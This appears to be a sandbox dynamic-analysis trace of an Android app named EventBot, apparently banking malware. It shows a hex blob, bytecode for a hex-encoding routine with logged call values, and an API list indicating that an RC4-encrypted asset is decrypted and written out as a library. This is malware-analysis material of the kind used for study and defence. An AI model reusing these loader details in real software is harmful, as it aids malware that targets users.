2e16bd041fe28afb97de430438aa879c78856f1b36ab8a3fb1172e0ff169b929b33133a0c042038e6302b4fe45a3b0b942959a7ec27aeed72e766672a56d9fd7d3300d14be92baaa2404d2da0dfb8407576fbfd993fafc79db9535560655b7bdf28e38a16dffaa425b67bef9805cc1cd1901b20ceb46dd93e43bfb12111e20747ffc2edc177e4aaafe0a19d3b2a49fb04b3f7e4d8cb12a070b32608fd8a3ff3dcd17782dfa6e0f062aa8b5cfabcb990e263e532de734a67434fefe89f68df5aec4ec9d42e06b50a568b23ba32054d93468a1971cf0317805f4cbe0d147b6670b986efc7ea1da6b91cfa65cae6ee9143823b371b7119fa7e0da43ee0402a9e78eef2249e12449326a06249e47f49288ee4b28809050d3a7595cf98553d0d49309d73d48e492aedc7c6a9bea1d795babdd5ccca12b250259523f8ece097c7f3620bb3fa934d9b6ec8812b937976d6c3625f793f65550c0e2d7b3e5df4af1fae0810bf3c0b12daf83f407be4aebcc40a253aab036b5aaeb69072bc1ee238a9b7b7c47f0b365fb82421597ec25da4201406a8cb10ea35672c163863c732104950fefb19bbc29ace5496c40b3d3081fcc2a69b0af34df9fc72f61e0e24582f4f2a5734391d4dc31e5d45307f1df0c39975c27df67ffdde81f1cca3583c6dcd3dcb799a8162db160780787f4460e4bed65c298d8b64f50fa5e52196ca824c70b562ae97a326146cc10239ae046e32d5968a794be90fc24797109978acecbe7e38a57258910a9d4c33445c9af4d3fe4be31611fe53a0f41bb4bf0c8f7e38c0b73496f59f71507c3930e55a17d13bd08480961bed19c4f3a6351bfdbdb4adc6ab3b898186bbbe5fc56a4bbdcaf82bc1066b6b3eab1dd22555df3174add514a4df1bfa620c42eda2e651f3561a138113b7f41851102099957c486f09c631032527045b702354320024ed1afe1c4a87258b8b82542f0fc57687fc77c0cebfe4aba7c0d3f9a36a6e982f791a45346a304ae4336051813e72050d66c8c90677332cfc84f602fdb96ea71ef50a27e53dd1a43908b9053ac0c45a1288680ff86e2671f26decefec4d61fcc147e997bb8ec98e80c61fdcdcbeb88d84caa63e87f701e6a4e0173f81dda0de70038129240bc5a3f7248d95af80005c59bd8babce48c796dc46bf767fa87c54e8124509ba49f682f9c4bf8593e770293833e415342d1965a006fd973a7152d5be9413afc84b6a1b4189c4b87a95c06fb5803deda69c1f86919911c759bf7b565dbac054fa202cf2411240927986799097d435dedd0e3999dcf39978517c37c5aa6d3dbde691d2f06232e0a6cf4b01a224fbdad871c3a842dcc5e1c93ecde734261efc9fd32cd41a7feba1e03c157db376faf1679d2fb1e8f78f451e359018e8e1c539af30de956a8d1c8f66ed6332446c75574674ee40a9cb0d423fdcde328ccf4aa80005a0f31b6795b3e78229d50c60fc7d1c87d52ecd6c4d241c101b5943eefa7d7a14e30e6c054ace860cda914b9690e84b26b57d6499e0a069118d1ec227d3e9582cf80c01162527ba616c1315881862f16de295aa9755b16302b6ac2c57ea888aae3d060b5209fa366d7f9d0db951a55da7c205944e33c821ee392c963929c9418c73266c4f8dcdefb320314de495efccf29b6483542a567a44cd6dd7c8e7981ca78536d83027f0179573a37d446979b7e915bb00224955e963c0b75855a4fd6a1cbb2e7afa6b775d8a4fb29890c37dc439386634246fe09c6bc139f323014c1733cf2e55b535f3753ec8130faa43c91b3e795fce37e99659a0e067f8d2465764537a2a68ca324deb2ed2ace43a39c11fc4dd31f9b26306fd9a3d7fa7555fde93b0fe3e531737b935bb57c51da9b639a69083bf1cdceee1dc5b7ab6e8d7c1f80766d5d592749a4ca47861dee709f37dffee041095484cd1bc8df2c7d839fea1e47f6087c4d392fa91ef929233c801143056badb7ef646a1c3df79518efbb3da4fd17eb8ea501a0a9ad6356529fc4799218529545eb22fb141afff918277c4366e3ae1c9b0514a153f6d3f96a46dd1ba49e6418202201d9999725fe36f94aee2564264498cba6f08426676214d5c4d51f619a3d660369fe4848e85a44794f4b308da4229c0ffe04d1abf54ecd1f5513c4d97d3c25b7e9400e684ee5178a874ab0bd3a110dbd9a97d4b2e4abc965403cf460976fba1aa9f875b5fcddc1ace8f2b600a1dc559b069fe830cfc62e9add8019711b040f758a2b833ce45cedaeabe11d9eca064c8b964c034b38679573de60f001332fbfe97b575911270b35ad14073f44142684cf4d4f8c398d088bc14b8ad7b06f773f2395748fc4d96131d2914606087b793625aa878d827f810292950f99a480f2d85c9c4ee6d113174601d7d7585003b06e07564de90d6d864ecd17e0a0c015ee4db58f4d7b8c342b9b734f874b94fb41be89c9efb35a082d0125f130aceb8d69c0d513859baf8b19d9aeb3fd2d9cebff300ed4f3d040ef629a8444bda3ca6460beefcb11c26cdb7370b2d72bc771c276a852af79eb9ea5981c7d5000b1d0ad6682b7ca2990f9af0c2d769a627decf6f28cc7d06c10bae9fe193f0e7e229c1e9124333940ac3ba7bbb72284bbee0d66f8e623c9be89462700fc8bf4ed702e2ce433154638d3fa088abd0134e7a84642ca90fb261616122d010c500aef9fc2b1b2eb2d927a2
                        • e35ac4c1c29caf1077f8728e647b3e41a5a785779626e0daab8d6542d49ebd9c
                        • ee40db488b6f2bc7ac33cc566601c52bf6cb093c611e0b583d4b3f210ec13c2ce3b2df8de8c61e12ca9852767737f889367fadae4172fd571f39c202bae06f3d116c2683d61bcbe21f12414f0cf46f5dce57ec86ce0d18467cb61e36605a304cc9c8bea18d717aff4c55b65f563df30ed23291897095ae7647ee55abf42cd08aabce59d3173a0c0027b8435a248600a2deba7bae633a5dcb4a59e505ae4bddf4e5687794c9b74ddcf3ea74de6b4faab69403f2166d2eab487b3041a6f236420821426ae9e75f90ae087eacfe3267e5aab0687eb09d550618386fdb0917834c6f0c731d0ce9486610528ce8995af2281c1f0c7eb41d58fe494a8c6875f248681e6424d351b6eb7f7b879098bb0a3636d07d144ad1c4ef813f9b18feddccb6db5e3ecf6e8f12f6ca2c1fe9a82bc1deeb3510712b964ebc840397730f93092c04b05169451fa2aa3e608c270e8448fdf94e63999b8ef642416f73d979d3568cee538ba36c7afb45d14365706ff9a772330851d1106bba7c3884e211cad1ab018d02edf293b297960ffe6394bd85e6b3480ad4619159b9da45988e6ec0b656e3d1010a409cd213ab0c82df1bd7d19eeb1d9515f734c27441aa0a1d4fde3482bc49a04050cb7b232bfa1cad7994fc08b7931713584e77c3b25aa5d607042009194e8259488d19a8715b4c465347462584f208525adc6b7863c6445007d5e34d3e9deeba3ee4185d98126b3142a13dccab8657991407fbf73495a9892d968be68137e02dd2eac4dd77f1d7b57952bf20d95df0fb269d648b0a48ed3cf460841ac75e4806affdf2b3fc63bd47fcc17e97a48c575f4e82b4fd914bfdf01e966bd22395f14b00e9bc76f8f679083f18ed04be8331d9367b50083a47b12305d745e5653fe5f5ffdde99aec5f2df8e8336895bf0b5d2f7a18e0ffe0f46c53a621e65f41e14fc55b6da241402e23c5b3e3067b25155a61cacef40d152bd1f91afac45bb9dc3d32581ebfa897d96786ea236cc1872b98d850761c4932f8fda0f1e1bbff908b479b51df4882fff2bd1a4a4d5b205fce0e980716d2bd2301fc2c87a08f88d3805f29fa6f9918e6b3124e2e18ee0854c31edbdcb7ab3c8ceb11534bfa929588d2506749930ad3f541566fc536a5d2918703d5a9a35c42f1c39190fbd229a28ef64e0c4d3b5fc5e563a24dbc727fa251df503dee926b2424a52e3a671a01a96274760bfeaeb8c8ff39b21e28d39f15919eb26e08e48ea7d3a06bbaf7ecedcd05c21b49ad64a2d876d0bedef2249b183c4ff05e8991332c77eee0f45286ddcb95e10f5c529e6d9dfd7e49af7206b28763b5e1c756b48a3233a0bf6fd00b90e35c448fcba9a73dd4fafdc40f53e28928e6fc6e6ead5f42734dc0be99a30645e36a9fddcfc541712a83542e28ebaeac01af4bdc192c35f5d46f8e7e8395c1e9a2df4973780e312439fd5e83aa5bf8d57effe1a957638704e1a7e9872273db4ebfbe8895bcfe38cfab245266fe5e0c9eb2a71f5e93d3204f057dc773e5f4bae84fc05491dbc17b15a96e48223c20694846726fa01c5e12a15bb2bb0ed8ca054eff85a9d94a4e89196a19582f31b88985502a0e1d08c4363dbe0e2c4249a7e4cd55e8b283982efc153516138202c0c5fc71fe746e65c60c0dbf61cec3b93b4f3b321dc4048033e5073f4dc1073e628f0565b513f09ceed0620901114533d2649fcfb5a592f1d2dfdeb3bb005870ba2bdb4ab77b8cb4b54dbd8b47b948a1b8c836ec6ab710ab7d6bcace41f47a7b4fd5bebf431fbd1da0ede61fe623aa0f6f464466eb5eede56ccd69a15330d98354943da930a42a9dc5de1a70f92e0a113690623a9ba87d4a22c8990fbdce9ecfdb222548510bb45aa8da689da53d8f540a0d82b7a40c8b4a8d390805870ef6f31035faa5f027c342a7b0bfef10a2ed2ff29446fe45a58c18295908dcf820e2aff8a244f8fb993620bf1a49d3727979a2bdf16ab963f63ca13a3571331ab01b38846d71124a0d848bf11c7cce8a1fc998024d4b9101e8ed992ce905e1d8d23127f35d0aa4c86e9b496483f027a3df6f85e8c1fbb56bd4459f83ea0d64069b8200fd22a185f1e5289a7b460cd8a71992f957876e8e2c1ba106f51fdb5a6824cf1969f47cf9bb071c2b4b9dd3e6021409ffd59788667e151a974a6680d9111107ee392d1c6101f8dcdaf2cd7bc1ed4b6fd5b9207e9ad82c16b081ad5ffcdde596412ad166e934c6ea20e3a761b2401c7c588dc96701e195efc8bab3c975cfb855d251dd899d753c78e6fd0ce74653b4191386337cebb04133e13a3666b7a7540de41fd4314b1769d6afc634a1e380913caadda882ff3cbd7bf4c284dd789a20fcc14a0e6f3b38982b104678c4543be898d5f026391e852d8ac17a7d19ba61a4abd4c38bf472bb69f07359cbf3093f1379a6f680967f75a7b1f740da51e97716bf648a1ea6d74704cb77c047315d9e152cbe5565837937cc5a726813ab99fad894d95a68bf3eaaa5e926ab51bb78205c5aadd590b2c8cd62fb36096f561b630aba4392d29a41d2fa3360f580685d5a271cfe22320805339a724a5e56ef9466619537f50bf8932532f7c2fc3f1dde78f5c218ab40372af1f3179edc9c72d57f567068569ff3fdf6d69e8d9859e1f96efcfc7f4f744b96f1ea21fefbd8d80d6c4eef9ab3e5748414d8d13b3f796a0a1a3a6fe3fdfd6f1ddabcd3e749e186b4bd54a04a7179b9e00cd0e45db683fd299337ec1f2c4deadba152085831b6e14d1ca5a60c51e16a3018edd894368d04d43abba77cbdae821e767efb79963b0efefc6663cb313a4b8119065c3b02f3f54bfc541542cf307c188735aa33ea9d11c2e5341a62494f5db5db2158f3b11cbdad7f6b548eae3b209e36ec7bf5b25cb044bcea0ecd42f50b2716aae81f070b08788647db6a6bcdbd21142ce019815bcea79fb16fa572e6f08e64d16a4d24dcc97ea22b8c181d240ba2d9f626fe04eda76dc4d7318124f9817cb1248a63faa85d538d1d917dec7eb080d92f9707196fcf2950aa8f089f8a66c5346777c61c14b9418b1928e51008dc1147b50d2e714afd4df7171ff80999fefa549c2efa1afeef954650f24822f0212e3a78ea84e7675a1dba27ece1d19193fb51bc21734844b6f73b7bf3078f4fe87e2843bf1154196426d432a147ed768293be168708369a6ce359569cab574f0f9cd1faf2983d90f58423522cff2382a79f303ca2a766211d795060241481a1e00323d87ba2ba3d8309ff3c8ea18e0111095f8059f9781dd152879eb67ad93001f205220eb2dacf50ac7759dd6cdcf302f405433d6829118033a36ec12d8a4f46706efc397bd47b0cb0855ab0a6b91c09dac6ace9571ef9f3065ef9b40c9448635545579d45f7b08c050db03cb138aa69c9851a6d416d0a37c9998377cb688b1112c4417603f522ed24d58d11a13b93223b4b1f12dbea0f1e260a81fc58ede873d66727429771f23a7a08dc2a8bce9aee746512d8354493210c06dbf6cd1146aa8d472d0fe2323718eb4148ec1aeeae4a41d9c80de9a1a667fabde618073e2be6abd2bcd050dd458631ed64019bd5fa78a3852d4073e517c4eff8b9660e5d53f027d8815c3cbfaab2c7fcb4383fb18166b8e83baa44bc01cff696363c9ba7d3ce9066d5a5a057b76bb76529a44ae3da34ad9351f39e6b95badc731d5bb21b8367775ad62329ce4622a0c57991cd93906ff7ca79e59f3ac2a35706c2b3154c199c6e9d3d4303a673dc3ffd9c8068cf28c7506a4353559f0e24072191b0a46fdaf133da0929264e642b0831784ca6cffa8f5a0756d6d54fb84c8eba47244945f6e6996e8f8612ba2ac9ef7cfaa9ffa6b27950431e221f466f28d690ec3f90109cc9a71004e31f4492ac9f621565ad8db29420bc63c0cba091ded5e65a6558862901ac6650e8d76d818d9655ed8b97642bd5df4abaa2aedb774d0e286a4aec2702d668b2d191e61020f5990fe3052525588ae6983d6fa521b93349090795f2127f9427120f07886fbe7a2eb9d4b0eeba51a92f47bc0c8bf5e0430bf5d1e9c6feaac5660cf3a8cbe8c1b217b5017f3ad6330ca9f4bb83360a408a9f5d359d4ee1
                        • efff7ca064ab6b782863a61545f76e9207f2c6fc89999853eba25af62afaed7a
                        • fa5498d5c4fb32dfb7d93d32cd252d47cf239588187e990ee8a0b0a417042232
                        Position Instruction Meta Information
                        0.prologue
                        1array-length v0, p1
                        2mul-int/lit8 v0, v0, 0x2
                        3new-array v1, v0, [C
                        4const/4 v0, 0x0
                        5goto_6: array-length v2, p1
                        6if-ge v0, v2, :cond_26
                        7aget-byte v2, p1, v0
                        8and-int/lit16 v2, v2, 0xff
                        9mul-int/lit8 v3, v0, 0x2
                        11iget-object v4, p0, Lcom/lib;->HEX_ARRAY:[C
                        12ushr-int/lit8 v5, v2, 0x4
                        13aget-char v4, v4, v5
                        14aput-char v4, v1, v3
                        15mul-int/lit8 v3, v0, 0x2
                        16add-int/lit8 v3, v3, 0x1
                        18iget-object v4, p0, Lcom/lib;->HEX_ARRAY:[C
                        19and-int/lit8 v2, v2, 0xf
                        20aget-char v2, v4, v2
                        21aput-char v2, v1, v3
                        22add-int/lit8 v0, v0, 0x1
                        23goto/16 :goto_6
                        24cond_26: new-instance v0, Ljava/lang/String;
                        26invoke-direct {v0, v1}, Ljava/lang/String;-><init>([C)V
                        • Time: 151040
                          • This:
                            • 44f93bf02770b1b859dbd07336f7d02ae05f841814e4d2bc9247da4b470a6153
                          • p0: [C@d8e83f8
                          • p0: 44f93bf02770b1b859dbd07336f7d02ae05f841814e4d2bc9247da4b470a6153
                          • Return:
                            • 44f93bf02770b1b859dbd07336f7d02ae05f841814e4d2bc9247da4b470a6153
                        • Time: 151073
                          • This:
                            • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • p0: [C@1a36736
                          • p0: 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • Return:
                            • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                        • Time: 151076
                          • This:
                            • 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                          • p0: [C@823e7a4
                          • p0: 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                          • Return:
                            • 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                        • Time: 151083
                          • This:
                            • bef1b6f57e61d4f5a7c6a65daf01947669d4da5b0822c60e037890d08659271b
                          • p0: [C@db4270e
                          • p0: bef1b6f57e61d4f5a7c6a65daf01947669d4da5b0822c60e037890d08659271b
                          • Return:
                            • bef1b6f57e61d4f5a7c6a65daf01947669d4da5b0822c60e037890d08659271b
                        • Time: 151154
                          • This:
                            • 91d8aff7f46aafbf6fd0deb4f0ac7c6d32e7bf3408e4fd18aca0942c0e2acf6a1a2c59142f46878dabc2c2c6dcebac0f7ad071fd72150c9836847ff4a000e5f967be9288a6d77ac1ecaaaa24d0a3cd23eaeb40924a8095dbb0eb490015df084f0d4a8196b7c59ceba76762c8c516a8daa18e5ee78db7b763bceaaf994bede31056547471427f9a9a36b9e57f557998801a77787acf0efb2075222787063504daaf8b1bd31a29074987b982eab826853ce057162b3a7731c4d2ca8eb90275bfc3fa0e4258c59d58c65dc0d412afd39af5213f95f78717a3e38c3c1f25b9c867b7c8083bcc5c4e27bdfe29fa24233c95062d2b488e1215ce6ca8b13f31fd0c999bfb7d14a29a9b5ed4ac6da36bc56c8eefc112c54200fc58a232251437227a7c7402eb5fbe1c08fb00db2043f0d8b7798c49fee39a44d5c35e26552510c0209c1acda5b6bfb42604940999ad772d9e82b3212623241032f640c183a091d6443aca5ef5a469711238a893346cc07d736cd6d1a67bf2b62f96ab3dd4b890f7d4b360b1c3507108b920fcfd607c38630b69f66f33b9dcf352ed4a8914d83f83d1dabacf15456e6f365c7b98f5249ccb6616cf5bfdb552f74aaae157933d5118b26b268ec832c3a9eeceba6f836e8f340b3a3b2c89c6192a8b7368f1c853bfae6d126c197161335510186e3954f3f7022c0ddcb289d6929c4df0c13ceda5bac05748f0
                          • p0: [C@bc1b041
                          • p0: 91d8aff7f46aafbf6fd0deb4f0ac7c6d32e7bf3408e4fd18aca0942c0e2acf6a1a2c59142f46878dabc2c2c6dcebac0f7ad071fd72150c9836847ff4a000e5f967be9288a6d77ac1ecaaaa24d0a3cd23eaeb40924a8095dbb0eb490015df084f0d4a8196b7c59ceba76762c8c516a8daa18e5ee78db7b763bceaaf994bede31056547471427f9a9a36b9e57f557998801a77787acf0efb2075222787063504daaf8b1bd31a29074987b982eab826853ce057162b3a7731c4d2ca8eb90275bfc3fa0e4258c59d58c65dc0d412afd39af5213f95f78717a3e38c3c1f25b9c867b7c8083bcc5c4e27bdfe29fa24233c95062d2b488e1215ce6ca8b13f31fd0c999bfb7d14a29a9b5ed4ac6da36bc56c8eefc112c54200fc58a232251437227a7c7402eb5fbe1c08fb00db2043f0d8b7798c49fee39a44d5c35e26552510c0209c1acda5b6bfb42604940999ad772d9e82b3212623241032f640c183a091d6443aca5ef5a469711238a893346cc07d736cd6d1a67bf2b62f96ab3dd4b890f7d4b360b1c3507108b920fcfd607c38630b69f66f33b9dcf352ed4a8914d83f83d1dabacf15456e6f365c7b98f5249ccb6616cf5bfdb552f74aaae157933d5118b26b268ec832c3a9eeceba6f836e8f340b3a3b2c89c6192a8b7368f1c853bfae6d126c197161335510186e3954f3f7022c0ddcb289d6929c4df0c13ceda5bac05748f0
                          • Return:
                            • 91d8aff7f46aafbf6fd0deb4f0ac7c6d32e7bf3408e4fd18aca0942c0e2acf6a1a2c59142f46878dabc2c2c6dcebac0f7ad071fd72150c9836847ff4a000e5f967be9288a6d77ac1ecaaaa24d0a3cd23eaeb40924a8095dbb0eb490015df084f0d4a8196b7c59ceba76762c8c516a8daa18e5ee78db7b763bceaaf994bede31056547471427f9a9a36b9e57f557998801a77787acf0efb2075222787063504daaf8b1bd31a29074987b982eab826853ce057162b3a7731c4d2ca8eb90275bfc3fa0e4258c59d58c65dc0d412afd39af5213f95f78717a3e38c3c1f25b9c867b7c8083bcc5c4e27bdfe29fa24233c95062d2b488e1215ce6ca8b13f31fd0c999bfb7d14a29a9b5ed4ac6da36bc56c8eefc112c54200fc58a232251437227a7c7402eb5fbe1c08fb00db2043f0d8b7798c49fee39a44d5c35e26552510c0209c1acda5b6bfb42604940999ad772d9e82b3212623241032f640c183a091d6443aca5ef5a469711238a893346cc07d736cd6d1a67bf2b62f96ab3dd4b890f7d4b360b1c3507108b920fcfd607c38630b69f66f33b9dcf352ed4a8914d83f83d1dabacf15456e6f365c7b98f5249ccb6616cf5bfdb552f74aaae157933d5118b26b268ec832c3a9eeceba6f836e8f340b3a3b2c89c6192a8b7368f1c853bfae6d126c197161335510186e3954f3f7022c0ddcb289d6929c4df0c13ceda5bac05748f0
                        • Time: 151219
                          • This:
                            • 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                          • p0: [C@5767b27
                          • p0: 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                          • Return:
                            • 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                        • Time: 151224
                          • This:
                            • bef1b6f57e61d4f5a7c6a65daf01947669d4da5b0822c60e037890d08659271b
                          • p0: [C@4380f7d
                          • p0: bef1b6f57e61d4f5a7c6a65daf01947669d4da5b0822c60e037890d08659271b
                          • Return:
                            • bef1b6f57e61d4f5a7c6a65daf01947669d4da5b0822c60e037890d08659271b
                        • Time: 151226
                          • This:
                            • 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                          • p0: [C@f45a2c3
                          • p0: 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                          • Return:
                            • 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                        • Time: 163963
                          • This:
                            • 0bfaeb359e4a5a8aeecf2c55d8561221760068b3a8955daa15ff27c3ab03dc72
                          • p0: [C@cafdbcc
                          • p0: 0bfaeb359e4a5a8aeecf2c55d8561221760068b3a8955daa15ff27c3ab03dc72
                          • Return:
                            • 0bfaeb359e4a5a8aeecf2c55d8561221760068b3a8955daa15ff27c3ab03dc72
                        • Time: 163969
                          • This:
                            • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • p0: [C@14df52a
                          • p0: 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • Return:
                            • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                        • Time: 163973
                          • This:
                            • 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                          • p0: [C@ae4e8b8
                          • p0: 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                          • Return:
                            • 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                        • Time: 163988
                          • This:
                            • 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                          • p0: [C@b61cacd
                          • p0: 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                          • Return:
                            • 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                        • Time: 164094
                          • This:
                            • 19e3f8c7dba690f8e523a373f74770221ba2d4a60e3a0b736958df130851d99bd38f31f171a11e5fa2380565259176390437f4f04f4deeb3af3d6a970274c4eae88fb89d0fa9a05108659e7b17e0d4aa1b7d422b84336027a43c64dafe73d503dd99a625f8e85cc677d8496fb51b7be59eed9270e134e22aa082d753e786d40cb55cc73c8505b7f6c3198b126d5b11567f12c35b3326b9c39321a322b354bec045d44d356d1020e2c24ca58ef8cda0a2dae5f9ea08008dcaafb1111ef7b44f62636d10acbd0e87a46ca990298e3d3a831dd6a6d3a75d8a34fb0de641e786dc776fd65f32c78e6cc5bbbdf8fb30fdf705b5f5195ef9691b804af4b1f5fe62cbe1c3b1403f6c0c127cdc3e05ee0221ca49655004286e575edce0cbd2b9b29b93bf892a7a76b2be252322b6c4042020811392740aca52143f55a3cf6bd789fa060868bfe3e15abad81483a575b5e17111f4617121bdf88799998922f78910aa7e8bed87f55c60d0f604a2f75b98c3b821ec8ea9660c6e3a39e16c69ad929f1f631178d48b7d442f0c4fa95abecb2b013ce21b04323be44d7b5d4e6aaa170a7ccedd0f935e80f83cb8588f2af8f85fee8e831ccefa822ba0d3d6fa4f845143117a88b5988ebd17ea370fb33edb67874608d49c1ee4687045974973770e3d82fa0a8ce2d31f929f0bffbbafdc3cdffd8c3c3a99e85f60aa837f770bc052acd2c28205
                          • p0: [C@7c7cffc
                          • p0: 19e3f8c7dba690f8e523a373f74770221ba2d4a60e3a0b736958df130851d99bd38f31f171a11e5fa2380565259176390437f4f04f4deeb3af3d6a970274c4eae88fb89d0fa9a05108659e7b17e0d4aa1b7d422b84336027a43c64dafe73d503dd99a625f8e85cc677d8496fb51b7be59eed9270e134e22aa082d753e786d40cb55cc73c8505b7f6c3198b126d5b11567f12c35b3326b9c39321a322b354bec045d44d356d1020e2c24ca58ef8cda0a2dae5f9ea08008dcaafb1111ef7b44f62636d10acbd0e87a46ca990298e3d3a831dd6a6d3a75d8a34fb0de641e786dc776fd65f32c78e6cc5bbbdf8fb30fdf705b5f5195ef9691b804af4b1f5fe62cbe1c3b1403f6c0c127cdc3e05ee0221ca49655004286e575edce0cbd2b9b29b93bf892a7a76b2be252322b6c4042020811392740aca52143f55a3cf6bd789fa060868bfe3e15abad81483a575b5e17111f4617121bdf88799998922f78910aa7e8bed87f55c60d0f604a2f75b98c3b821ec8ea9660c6e3a39e16c69ad929f1f631178d48b7d442f0c4fa95abecb2b013ce21b04323be44d7b5d4e6aaa170a7ccedd0f935e80f83cb8588f2af8f85fee8e831ccefa822ba0d3d6fa4f845143117a88b5988ebd17ea370fb33edb67874608d49c1ee4687045974973770e3d82fa0a8ce2d31f929f0bffbbafdc3cdffd8c3c3a99e85f60aa837f770bc052acd2c28205
                          • Return:
                            • 19e3f8c7dba690f8e523a373f74770221ba2d4a60e3a0b736958df130851d99bd38f31f171a11e5fa2380565259176390437f4f04f4deeb3af3d6a970274c4eae88fb89d0fa9a05108659e7b17e0d4aa1b7d422b84336027a43c64dafe73d503dd99a625f8e85cc677d8496fb51b7be59eed9270e134e22aa082d753e786d40cb55cc73c8505b7f6c3198b126d5b11567f12c35b3326b9c39321a322b354bec045d44d356d1020e2c24ca58ef8cda0a2dae5f9ea08008dcaafb1111ef7b44f62636d10acbd0e87a46ca990298e3d3a831dd6a6d3a75d8a34fb0de641e786dc776fd65f32c78e6cc5bbbdf8fb30fdf705b5f5195ef9691b804af4b1f5fe62cbe1c3b1403f6c0c127cdc3e05ee0221ca49655004286e575edce0cbd2b9b29b93bf892a7a76b2be252322b6c4042020811392740aca52143f55a3cf6bd789fa060868bfe3e15abad81483a575b5e17111f4617121bdf88799998922f78910aa7e8bed87f55c60d0f604a2f75b98c3b821ec8ea9660c6e3a39e16c69ad929f1f631178d48b7d442f0c4fa95abecb2b013ce21b04323be44d7b5d4e6aaa170a7ccedd0f935e80f83cb8588f2af8f85fee8e831ccefa822ba0d3d6fa4f845143117a88b5988ebd17ea370fb33edb67874608d49c1ee4687045974973770e3d82fa0a8ce2d31f929f0bffbbafdc3cdffd8c3c3a99e85f60aa837f770bc052acd2c28205
                        • Time: 164220
                          • This:
                            • 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                          • p0: [C@d65fcda
                          • p0: 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                          • Return:
                            • 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                        • Time: 164225
                          • This:
                            • 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                          • p0: [C@2bfefe8
                          • p0: 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                          • Return:
                            • 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                        • Time: 164233
                          • This:
                            • 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                          • p0: [C@bb70ca6
                          • p0: 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                          • Return:
                            • 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                        • Time: 186461
                          • This:
                            • cc09f99f634812fd4f4c1a21f01695bad263559705dae566927850134d733432
                          • p0: [C@9561f76
                          • p0: cc09f99f634812fd4f4c1a21f01695bad263559705dae566927850134d733432
                          • Return:
                            • cc09f99f634812fd4f4c1a21f01695bad263559705dae566927850134d733432
                        • Time: 186470
                          • This:
                            • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • p0: [C@bc7f9e4
                          • p0: 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • Return:
                            • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                        • Time: 186474
                          • This:
                            • ca0426b6d81ba20cccef4fe11a803d893527d6fcd9c3b7128c23d3d57bcbf501
                          • p0: [C@f7cbd02
                          • p0: ca0426b6d81ba20cccef4fe11a803d893527d6fcd9c3b7128c23d3d57bcbf501
                          • Return:
                            • ca0426b6d81ba20cccef4fe11a803d893527d6fcd9c3b7128c23d3d57bcbf501
                        • Time: 186493
                          • This:
                            • 86e549439e1c3e7e88bc7e996fc9f25dde14e8e97d1fbf5a32d8afaf0c8803ce
                          • p0: [C@7ce306f
                          • p0: 86e549439e1c3e7e88bc7e996fc9f25dde14e8e97d1fbf5a32d8afaf0c8803ce
                          • Return:
                            • 86e549439e1c3e7e88bc7e996fc9f25dde14e8e97d1fbf5a32d8afaf0c8803ce
                        • 52 additional calls hidden ...
                        27return-object v0
                        Cross References
                        APIs
                        • com.example.eventbot.service.getAssets
                        • android.content.res.AssetManager.open
                        • java.io.BufferedInputStream.<init>
                        • java.io.FileOutputStream.<init>
                        • java.io.BufferedOutputStream.<init>
                        • java.io.BufferedInputStream.available
                        • java.io.BufferedInputStream.read
                        • java.io.BufferedInputStream.close
                        • javax.crypto.Cipher.getInstance
                        • java.lang.String.getBytes
                        • javax.crypto.spec.SecretKeySpec.<init>
                        • javax.crypto.Cipher.init
                        • javax.crypto.Cipher.doFinal
                        • java.io.OutputStream.write
                        • java.io.OutputStream.close
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.d
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.d
                        • java.io.OutputStream.close
                        • java.io.IOException.printStackTrace
                        • java.io.BufferedInputStream.close
                        • java.io.IOException.printStackTrace
                        Strings
                        • RC4
                        • [func] [service] [prepareLib] Throwable:
                        • [func] [service] [prepareLib] IOException:
                        Position Instruction Meta Information
                        1const-string v0, "RC4"
                        2const/4 v1, 0x0
